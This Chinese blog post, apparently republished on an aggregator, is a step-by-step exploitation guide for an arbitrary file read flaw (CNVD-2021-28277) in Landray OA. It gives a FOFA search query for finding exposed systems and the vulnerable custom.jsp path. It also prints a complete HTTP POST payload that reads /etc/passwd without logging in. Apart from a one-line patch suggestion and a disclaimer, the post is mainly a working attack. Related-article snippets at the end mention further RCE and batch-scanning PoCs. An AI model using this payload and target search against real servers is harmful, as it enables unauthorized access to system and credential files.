蓝凌OA前台任意文件读取漏洞利用

news/2024/12/1 0:25:58/

近期CNVD爆出漏洞编号:CNVD-2021-28277,首次公开日期为2021-04-15,蓝凌oa存在多个漏洞,攻击者可利用该漏洞获取服务器控制权。今天挑选一个蓝凌OA前台任意文件读取漏洞进行分析使用。链接:https://www.cnvd.org.cn/flaw/show/CNVD-2021-28277

蓝凌简介:蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,近期Landray-OA系统被爆出存任意文件读取漏洞。

一、漏洞位置

FOFA网络空间引擎,FOFA语法:app="Landray-OA系统"

打开测试网站前台登录页面:

漏洞的路径在 xxxxx/sys/ui/extend/varkind/custom.jsp下面,也就是custom.jsp里面,需要使用post请求方式,请求的参数为var={"body":{"file":"file:///etc/passwd"}}

使用hackbar火狐插件修改为post请求传递参数,打开 xxxxx/sys/ui/extend/varkind/custom.jsp为如下画面显示

二、漏洞验证

可以看见,只需对file里面的参数进行修改,就可以任意读取系统文件passwd信息的高危漏洞;

 

或者使用burp测试:

漏洞payload为

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=EA419896062AC4B6FE325FF08B8AF36E
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

var={"body":{"file":"file:///etc/passwd"}}

修复建议:建议使用蓝凌OA的系统更新系统至最新版本,附录地址:https://www.landray.com.cn/

特别声明:

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。

作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。切勿用于非法,仅供学习参考


http://www.ppmy.cn/news/341283.html

相关文章

蓝凌ekp开发_蓝凌OA系统,蓝凌EKP,蓝凌KK__房地产案例应用__恒大集团

作为中国地产行业标杆,恒大集团拥有员工39000多人,在全国33个城市设立了分公司,在全国122个主要城市拥有大型项目229个。如何实现全集团的协同沟通?如何结合业务规范、统一流程?如何实现专业知识、业务案例和管理经验快…

蓝凌OA常用表整理

SELECT * FROM V_FI_ORG_EMP --用户表视图(关联单位)SELECT * FROM FI_ORG_EMP --用户表 SELECT * FROM FI_ORG_INFO --单位表 SELECT * FROM V_FI_ORG_DEPT --部门表视图(关联单位) SELECT * FROM FI_ORG_POSITION --职位表 SELECT * FROM OA_FORM_INFO where name …

蓝凌OA统计程流审批效率SQL

蓝凌OA版本v11 SELECT KRM.fd_id, --流程IDKRT.fd_name AS WF_NAME, --流程模板名称KRM.fd_number, --流程编号KRM.doc_subject, --流程主题SOE.fd_name AS EMP_NAME, --节点审批人或起草人LHW.fd_start_date, --节点审批开始时间LHW.fd_finish_date, --节点审批完成时间…

蓝凌OA漏洞分析与处置方案

漏洞1:蓝凌OA sysSearchMain.do 远程命令执行漏洞 漏洞描述 蓝凌OA sysSearchMain.do文件 存在任意文件写入漏洞,攻击者获取后台权限后可通过漏洞写入任意文件,也可以通过 custom.jsp 文件未授权写入恶意文件 漏洞影响 蓝凌OA 搜索语法

【漏洞复现】蓝凌OA近期公开几个漏洞汇总

0x00 蓝凌OA custom.jsp 任意文件读取漏洞 1、app”Landray-OA系统” 2、漏洞复现 出现漏洞的文件为 custom.jsp <%page import"com.landray.kmss.util.ResourceUtil"%> <%page import"net.sf.json.JSONArray"%> <%page import"ne…

蓝凌oa任意文件读取,RCE

蓝凌简介&#xff1a;蓝凌软件全称深圳市蓝凌软件股份有限公司&#xff0c;于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商&#xff0c;是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业&#xff0c;…

Python 蓝凌OA任意文件读取批量扫描 poc编写

0x00 前言 CNVD-2021-28277 蓝凌软件全称深圳市蓝凌软件股份有限公司&#xff0c;于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商&#xff0c;是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业&…

蓝凌OA自定义公式样例库

判断表单多值属性框(复选框/下拉菜单)是否勾选了某个选项 $列表.包含$($多值属性框$.split(";"), "选项的值")获取员工编号 $申请人$.getFdNo()获取所属机构 $申请人$.getFdParentOrg()